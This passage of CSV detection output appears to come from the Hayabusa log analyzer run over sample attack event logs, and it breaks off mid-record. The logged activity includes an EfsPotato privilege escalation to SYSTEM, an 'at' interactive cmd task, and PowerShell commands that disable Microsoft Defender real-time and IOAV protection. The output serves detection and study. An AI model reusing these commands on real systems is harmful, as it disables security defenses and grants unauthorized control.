PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx 2021-10-06 18:34:50.487 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.513 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.787 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.788 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.794 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.797 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.805 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.881 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; 